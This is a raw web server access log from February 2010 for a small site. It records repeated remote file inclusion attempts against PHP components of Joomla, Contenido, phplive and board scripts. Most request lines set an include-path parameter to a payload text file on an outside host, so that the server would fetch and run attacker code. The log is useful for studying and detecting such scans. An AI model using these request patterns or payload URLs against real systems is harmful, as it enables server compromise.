61.78.109.87 - - [21/Feb/2010:10:29:51 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:10:29:52 -0800] "GET /logs/access_100128.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:10:30:27 -0800] "GET /logs/access_100126.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:30:40 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:30:45 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:30:45 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:30:47 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:30:52 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:31:42 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:10:32:41 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:10:32:41 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:10:35:56 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:10:35:57 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [21/Feb/2010:10:36:15 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
213.239.230.130 - - [21/Feb/2010:10:36:15 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:36:43 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:36:44 -0800] "GET /logs/access_100127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:37:45 -0800] "GET /logs/access_100126.log//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:38:12 -0800] "GET /logs/access_100207.log//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:38:41 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:38:41 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:38:41 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:39:17 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:39:17 -0800] "GET /logs/access_100127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:39:17 -0800] "GET /logs/access_100129.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:39:22 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:39:37 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:39:37 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:39:38 -0800] "GET /logs/access_100126.log//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:40:01 -0800] "GET /logs/access_100207.log//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:10:42:06 -0800] "GET /skin/zero_vote/login.php?dir=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:10:42:06 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:10:42:06 -0800] "GET /logs/access_100204.log%20%20//skin/zero_vote/login.php?dir=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.115.111.242 - - [21/Feb/2010:10:42:31 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
208.115.111.242 - - [21/Feb/2010:10:42:31 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:43:11 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:43:14 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:43:25 -0800] "GET /logs/access_100126.log//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:43:27 -0800] "GET /logs/access_100126.log//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:43:50 -0800] "GET /logs/access_100207.log//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:43:53 -0800] "GET /logs/access_100207.log//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:45:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:45:36 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:45:36 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:10:46:01 -0800] "GET /phplive/setup/header.php?css_path? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:10:46:01 -0800] "GET /logs/phplive/setup/header.php?css_path? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:10:46:01 -0800] "GET /logs/phplive/setup/header.php?css_pathhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:10:46:01 -0800] "GET /phplive/setup/header.php?css_pathhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:46:31 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:46:31 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:46:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:33 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:34 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:34 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:49 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:50 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:50 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:52 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:52 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:46:52 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:10:46:59 -0800] "GET /logs///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:10:46:59 -0800] "GET /logs/access_100116.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:10:46:59 -0800] "GET //?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:47:18 -0800] "GET /logs/access_100210.log//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:47:25 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:47:25 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:47:25 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:47:34 -0800] "GET /logs/access_100205.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:47:34 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:47:34 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:10:47:58 -0800] "GET /logs/access_100113.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:48:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:48:01 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:48:05 -0800] "GET /logs/access_100205.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:48:05 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:48:08 -0800] "GET /logs/access_100210.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:48:12 -0800] "GET /logs/access_100210.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:48:24 -0800] "GET /logs/access_100205.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:48:34 -0800] "GET /logs/access_100117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:49:04 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:49:04 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:49:10 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:49:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:49:14 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:49:17 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:10:49:45 -0800] "GET /logs/access_100121.log////administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:10:49:45 -0800] "GET ///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:10:49:45 -0800] "GET /logs////administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:10:49:54 -0800] "GET ///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:10:49:55 -0800] "GET /logs/access_100121.log%20%20////administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:10:49:55 -0800] "GET /logs////administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:50:12 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:50:12 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:50:16 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:02 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:02 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:02 -0800] "GET /logs/access_100205.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:51:03 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:51:08 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:51:08 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:11 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:11 -0800] "GET /logs/access_100120.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:11 -0800] "GET /logs/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:12 -0800] "GET /index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:26 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:26 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:26 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:29 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
